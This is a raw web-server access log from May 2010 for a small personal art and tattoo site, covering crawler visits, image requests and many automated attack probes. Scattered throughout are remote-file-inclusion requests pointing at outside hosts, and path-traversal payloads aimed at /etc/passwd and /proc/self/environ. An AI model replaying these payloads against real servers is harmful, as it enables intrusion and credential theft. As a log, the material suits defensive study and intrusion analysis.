75.247.8.71 - - [19/May/2010:21:27:21 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; eSobiSubscriber 2.0.4.16; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
75.247.8.71 - - [19/May/2010:21:27:21 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; eSobiSubscriber 2.0.4.16; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
75.247.8.71 - - [19/May/2010:21:27:22 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; eSobiSubscriber 2.0.4.16; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
75.247.8.71 - - [19/May/2010:21:27:22 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; eSobiSubscriber 2.0.4.16; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
75.247.8.71 - - [19/May/2010:21:27:36 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; eSobiSubscriber 2.0.4.16; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
75.247.8.71 - - [19/May/2010:21:27:36 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; eSobiSubscriber 2.0.4.16; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
75.247.8.71 - - [19/May/2010:21:27:36 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; eSobiSubscriber 2.0.4.16; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
75.247.8.71 - - [19/May/2010:21:27:37 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; eSobiSubscriber 2.0.4.16; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
207.46.13.142 - - [19/May/2010:21:29:06 -0500] "GET /logs/access_log.1239667200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [19/May/2010:21:31:03 -0500] "GET /logs/access_log.1203465600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [19/May/2010:21:36:46 -0500] "GET /logs/access_log.1189209600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.94 - - [19/May/2010:21:37:05 -0500] "GET /logs/access_log.1195948800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.195.233 - - [19/May/2010:21:39:05 -0500] "GET /logs/access_log.1263600000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
83.69.115.198 - - [19/May/2010:21:40:04 -0500] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
83.69.115.198 - - [19/May/2010:21:40:04 -0500] "GET //modules/coppermine/include/init.inc.php?CPG_M_DIR=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
83.69.115.198 - - [19/May/2010:21:40:04 -0500] "GET /logs/access_log.1270512000//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
69.94.137.93 - - [19/May/2010:21:41:15 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
69.94.137.93 - - [19/May/2010:21:41:15 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
69.94.137.93 - - [19/May/2010:21:41:15 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
69.94.137.93 - - [19/May/2010:21:41:15 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
69.94.137.93 - - [19/May/2010:21:42:00 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
69.94.137.93 - - [19/May/2010:21:42:00 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
87.250.255.243 - - [19/May/2010:21:43:13 -0500] "GET /logs/access_log.1211328000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
69.94.137.93 - - [19/May/2010:21:43:51 -0500] "GET /logs/access_log.1273017600/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
69.94.137.93 - - [19/May/2010:21:43:51 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
69.94.137.93 - - [19/May/2010:21:43:51 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
69.94.137.93 - - [19/May/2010:21:43:59 -0500] "GET /logs/access_log.1273017600/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
69.94.137.93 - - [19/May/2010:21:43:59 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
69.94.137.93 - - [19/May/2010:21:43:59 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
207.46.13.41 - - [19/May/2010:21:44:35 -0500] "GET /logs/access_log.1245801600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
69.94.137.93 - - [19/May/2010:21:45:09 -0500] "GET /logs/access_log.1273017600/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
69.94.137.93 - - [19/May/2010:21:45:09 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
69.94.137.93 - - [19/May/2010:21:45:09 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
69.94.137.93 - - [19/May/2010:21:45:13 -0500] "GET /logs/access_log.1273017600/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
69.94.137.93 - - [19/May/2010:21:45:13 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
69.94.137.93 - - [19/May/2010:21:45:13 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
87.250.255.243 - - [19/May/2010:21:47:50 -0500] "GET /logs/access_log.1202169600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.252.3.123 - - [19/May/2010:21:51:59 -0500] "GET //main_prepend.php?_SERWEB[functionsdir]=http://sex-perm.ru///1.jpg??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
87.252.3.123 - - [19/May/2010:21:51:59 -0500] "GET /logs/access_log.1266019200//main_prepend.php?_SERWEB[functionsdir]=http://sex-perm.ru///1.jpg??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
87.252.3.123 - - [19/May/2010:21:51:59 -0500] "GET /logs//main_prepend.php?_SERWEB[functionsdir]=http://sex-perm.ru///1.jpg??? HTTP/1.1" 404 306 "-""Mozilla/5.0"
124.217.229.185 - - [19/May/2010:21:52:53 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
124.217.229.185 - - [19/May/2010:21:52:54 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
87.250.255.243 - - [19/May/2010:21:54:19 -0500] "GET /logs/access_log.1248048000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
124.217.229.185 - - [19/May/2010:21:55:15 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
124.217.229.185 - - [19/May/2010:21:55:50 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [19/May/2010:21:55:51 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
187.45.193.159 - - [19/May/2010:21:56:41 -0500] "GET /logs/access_log.1273276800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
187.45.193.159 - - [19/May/2010:21:56:42 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
187.45.193.159 - - [19/May/2010:21:56:42 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
124.217.229.185 - - [19/May/2010:21:58:53 -0500] "GET /logs/access_log.1273017600/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
124.217.229.185 - - [19/May/2010:21:58:54 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
124.217.229.185 - - [19/May/2010:21:58:55 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
87.250.255.243 - - [19/May/2010:21:59:10 -0500] "GET /logs/access_log.1158278400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
124.217.229.185 - - [19/May/2010:22:04:06 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
94.23.238.27 - - [19/May/2010:22:04:10 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)"
94.23.238.27 - - [19/May/2010:22:04:10 -0500] "GET /artwork/hospitals.htm HTTP/1.0" 200 3315 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)"
94.23.238.27 - - [19/May/2010:22:04:12 -0500] "GET /logs/access_log.1263081600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)"
94.23.238.27 - - [19/May/2010:22:04:14 -0500] "GET /logs/access_log.1264032000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)"
94.23.238.27 - - [19/May/2010:22:04:19 -0500] "GET /logs/access_log.1270598400 HTTP/1.0" 200 229376 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)"
87.250.255.243 - - [19/May/2010:22:05:38 -0500] "GET /logs/access_log.1168992000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.52 - - [19/May/2010:22:06:35 -0500] "GET /logs/access_log.1262563200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [19/May/2010:22:07:35 -0500] "GET /logs/access_log.1199664000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
187.45.193.159 - - [19/May/2010:22:11:04 -0500] "GET /logs/access_log.1273363200//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
87.250.255.243 - - [19/May/2010:22:12:07 -0500] "GET /logs/access_log.1194998400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
124.217.229.185 - - [19/May/2010:22:13:00 -0500] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
124.217.229.185 - - [19/May/2010:22:13:01 -0500] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
207.46.195.232 - - [19/May/2010:22:14:35 -0500] "GET /logs/access_log.1256256000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [19/May/2010:22:16:40 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [19/May/2010:22:18:53 -0500] "GET /logs/access_log.1247097600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [19/May/2010:22:19:11 -0500] "GET /?S=A HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
71.215.86.83 - - [19/May/2010:22:21:21 -0500] "GET /artwork/shootingfishinabarrel.png HTTP/1.1" 200 55770 "http://englishpatterns.com/community/240""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 ( .NET CLR 3.5.30729)"
211.180.203.200 - - [19/May/2010:22:21:26 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
211.180.203.200 - - [19/May/2010:22:22:12 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
87.250.255.243 - - [19/May/2010:22:22:34 -0500] "GET /logs/access_log.1168041600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
84.40.30.37 - - [19/May/2010:22:27:03 -0500] "GET /logs///bbs/delete_all.php?board_skin_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 309 "-""Mozilla/5.0"
84.40.30.37 - - [19/May/2010:22:27:03 -0500] "GET /logs/access_log.1271548800///bbs/delete_all.php?board_skin_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 331 "-""Mozilla/5.0"
84.40.30.37 - - [19/May/2010:22:27:03 -0500] "GET ///bbs/delete_all.php?board_skin_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 304 "-""Mozilla/5.0"
87.250.255.243 - - [19/May/2010:22:27:10 -0500] "GET /logs/access_log.1154736000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
84.40.30.37 - - [19/May/2010:22:27:28 -0500] "GET ///bbs/delete_all.php?board_skin_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 304 "-""Mozilla/5.0"
84.40.30.37 - - [19/May/2010:22:27:28 -0500] "GET /logs///bbs/delete_all.php?board_skin_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 309 "-""Mozilla/5.0"
84.40.30.37 - - [19/May/2010:22:27:28 -0500] "GET /logs/access_log.1271548800///bbs/delete_all.php?board_skin_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 331 "-""Mozilla/5.0"
87.250.255.243 - - [19/May/2010:22:30:52 -0500] "GET /logs/access_log.1175472000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
72.30.142.216 - - [19/May/2010:22:31:34 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.142.216 - - [19/May/2010:22:31:34 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
84.40.30.37 - - [19/May/2010:22:33:12 -0500] "GET /logs/access_log.1265241600///bbs/delete_all.php?board_skin_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 331 "-""Mozilla/5.0"
207.46.199.180 - - [19/May/2010:22:33:13 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
84.40.30.37 - - [19/May/2010:22:33:39 -0500] "GET /logs/access_log.1265241600///bbs/delete_all.php?board_skin_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 331 "-""Mozilla/5.0"
87.250.255.243 - - [19/May/2010:22:36:26 -0500] "GET /logs/access_log.1257465600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [19/May/2010:22:42:55 -0500] "GET /logs/access_log.1182729600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
174.121.158.8 - - [19/May/2010:22:46:48 -0500] "GET /logs/tools.php?p=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""-"
174.121.158.8 - - [19/May/2010:22:46:49 -0500] "GET /logs/tools.php?p=./../../../../../../../../etc/passwd HTTP/1.1" 404 298 "-""-"
174.121.158.8 - - [19/May/2010:22:46:49 -0500] "GET /tools.php?p=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""-"
174.121.158.8 - - [19/May/2010:22:46:49 -0500] "GET /tools.php?p=./../../../../../../../../etc/passwd HTTP/1.1" 404 293 "-""-"
124.217.229.185 - - [19/May/2010:22:48:02 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
124.217.229.185 - - [19/May/2010:22:48:02 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
87.250.255.243 - - [19/May/2010:22:48:43 -0500] "GET /logs/access_log.1182211200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.133 - - [19/May/2010:22:51:35 -0500] "GET /logs/access_log.1192233600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [19/May/2010:22:52:04 -0500] "GET /logs/access_log.1179014400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [19/May/2010:22:55:52 -0500] "GET /logs/access_log.1190937600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.13.139 - - [19/May/2010:22:57:04 -0500] "GET /logs/access_log.1268352000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.234 - - [19/May/2010:22:58:36 -0500] "GET /logs/?M=A HTTP/1.1" 200 6273 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [19/May/2010:22:58:36 -0500] "GET /logs/access_log.1215561600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
84.40.30.37 - - [19/May/2010:23:02:56 -0500] "GET /logs/access_log.1270512000/?sourcedir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
84.40.30.37 - - [19/May/2010:23:02:56 -0500] "GET /?sourcedir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
84.40.30.37 - - [19/May/2010:23:02:57 -0500] "GET /logs/?sourcedir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 6273 "-""Mozilla/5.0"
84.40.30.37 - - [19/May/2010:23:03:19 -0500] "GET /?sourcedir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
84.40.30.37 - - [19/May/2010:23:03:19 -0500] "GET /logs/access_log.1270512000/?sourcedir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
84.40.30.37 - - [19/May/2010:23:03:19 -0500] "GET /logs/?sourcedir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 6273 "-""Mozilla/5.0"
207.46.195.229 - - [19/May/2010:23:04:35 -0500] "GET /logs/access_log.1175644800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.191 - - [19/May/2010:23:05:05 -0500] "GET /logs/access_log.1177286400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [19/May/2010:23:05:09 -0500] "GET /logs/access_log.1209513600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
211.180.203.200 - - [19/May/2010:23:05:28 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
207.46.199.40 - - [19/May/2010:23:10:06 -0500] "GET /logs/access_log.1242000000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [19/May/2010:23:10:43 -0500] "GET /tattoo/set4.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
213.160.120.204 - - [19/May/2010:23:13:30 -0500] "GET /logs/access_log.1272844800/_functions.php?prefix=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.805"
213.160.120.204 - - [19/May/2010:23:13:33 -0500] "GET /_functions.php?prefix=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
213.160.120.204 - - [19/May/2010:23:13:33 -0500] "GET /logs/_functions.php?prefix=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 303 "-""libwww-perl/5.805"
67.195.112.180 - - [19/May/2010:23:13:49 -0500] "GET /logs/access_log.1169769600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.54.52.210 - - [19/May/2010:23:14:51 -0500] "GET /logs/access_log.1272844800/_functions.php?prefix=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
74.54.52.210 - - [19/May/2010:23:14:51 -0500] "GET /_functions.php?prefix=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
74.54.52.210 - - [19/May/2010:23:14:51 -0500] "GET /logs/_functions.php?prefix=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 303 "-""libwww-perl/5.810"
87.250.255.243 - - [19/May/2010:23:15:21 -0500] "GET /logs/access_log.1172534400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
65.182.191.100 - - [19/May/2010:23:15:53 -0500] "GET /logs/access_log.1272844800/_functions.php?prefix=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.811"
65.182.191.100 - - [19/May/2010:23:15:53 -0500] "GET /_functions.php?prefix=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.811"
65.182.191.100 - - [19/May/2010:23:15:53 -0500] "GET /logs/_functions.php?prefix=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 303 "-""libwww-perl/5.811"
69.168.54.22 - - [19/May/2010:23:16:09 -0500] "GET /logs/access_log.1272844800/_functions.php?prefix=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.805"
69.168.54.22 - - [19/May/2010:23:16:09 -0500] "GET /_functions.php?prefix=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
69.168.54.22 - - [19/May/2010:23:16:10 -0500] "GET /logs/_functions.php?prefix=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 303 "-""libwww-perl/5.805"
67.195.112.180 - - [19/May/2010:23:16:52 -0500] "GET /artwork/artmaster.htm HTTP/1.0" 200 886 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
69.168.54.22 - - [19/May/2010:23:17:16 -0500] "GET /logs/access_log.1272844800/_functions.php?prefix=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.805"
69.168.54.22 - - [19/May/2010:23:17:16 -0500] "GET /_functions.php?prefix=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
69.168.54.22 - - [19/May/2010:23:17:16 -0500] "GET /logs/_functions.php?prefix=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 303 "-""libwww-perl/5.805"
207.46.199.54 - - [19/May/2010:23:17:35 -0500] "GET /logs/access_log.1266883200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
74.54.52.210 - - [19/May/2010:23:17:39 -0500] "GET /logs/access_log.1272844800/_functions.php?prefix=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
74.54.52.210 - - [19/May/2010:23:17:39 -0500] "GET /_functions.php?prefix=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
74.54.52.210 - - [19/May/2010:23:17:39 -0500] "GET /logs/_functions.php?prefix=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 303 "-""libwww-perl/5.810"
65.182.191.100 - - [19/May/2010:23:17:41 -0500] "GET /logs/access_log.1272844800/_functions.php?prefix=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.811"
65.182.191.100 - - [19/May/2010:23:17:42 -0500] "GET /_functions.php?prefix=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.811"
65.182.191.100 - - [19/May/2010:23:17:42 -0500] "GET /logs/_functions.php?prefix=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 303 "-""libwww-perl/5.811"
87.250.255.243 - - [19/May/2010:23:19:59 -0500] "GET /logs/access_log.1254873600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
213.160.120.204 - - [19/May/2010:23:20:06 -0500] "GET /logs/access_log.1272844800/_functions.php?prefix=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.805"
213.160.120.204 - - [19/May/2010:23:20:06 -0500] "GET /_functions.php?prefix=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
